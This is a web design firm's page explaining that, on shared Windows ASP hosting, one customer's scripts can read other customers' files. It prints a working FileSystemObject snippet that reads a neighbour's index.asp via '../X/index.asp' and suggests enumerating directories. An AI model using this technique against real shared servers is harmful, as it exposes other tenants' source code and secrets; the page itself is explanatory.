D-Mack-Media-Logo

Vancouver Website Design

Complete Website Management

Full Email Newsletter Campaigns

Customized HTML & PHP Programming
Dedicated and Professional Customer Service

D-Mack-Media-Logo

Security Risks on ASP Based Shared Servers

Basically, the security on shared windows servers, supporting ASP, is not very high. A simple problem, with large consequences is file security.

Let's say, user X can upload ASP pages to the directory /User/X. User Y has the same hosting package and can upload to /User/Y. Most hosts just create an FTP account for every user, pointing them to there own directory. So far, so good. Every user can upload there nice websites into there own directory.

But then, the FileSystemObject comes into the picture. Let's say user X has a file /user/X/index.asp which contains all sorts of information, but noone but him is supposed to reach the code.

If you happen to be user Y, and use the code below, you get a copy of index.asp from X his directory. The file is, on most windows based servers, readable to all ASP pages.

The code:

<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set fi = fs.OpenTextFile(Server.MapPath("../X/index.asp"))
response.write fi.ReadAll
fi.close
Set fi = nothing
Set fs = nothing
%>

The explanation:

Set fs = CreateObject("Scripting.FileSystemObject")
This simply creates the object

Set fi = fs.OpenTextFile(Server.MapPath("../X/index.asp"))
This opens the specified name on the server.

response.write fi.ReadAll
This gets all the content of the file and displays it.

It is as simple as that, and that is where the danger lies.
When you have some more time you can experiment with the following items:

Set f = fs.GetFolder(Some Dir)
For Each sf in f.SubFolders ... next
For Each fi in f.Files ... next
Use this to get the content of directories if you do not know what is in them.

Just so you know, altering ASP pages not belonging to you is not allowed (in most countries, I assume). But there are also legal ways to use these pieces of code, like making a remote editor, to alter your ASP pages from everywhere.

You might be wondering if linux servers have the same problem, well they don't. File security is much stricter on linux based systems. You can still browse around the files and directories on shared systems, but only if you have access to them.

Click the link below to view a summary of the services that D-Mack Media offers. The document will open in a new window and is in Adobe® PDF® format that you can save and print. If you need the free Adobe Reader, click the Adobe logo Adobe Reader
D-Mack Media Services (233kb)...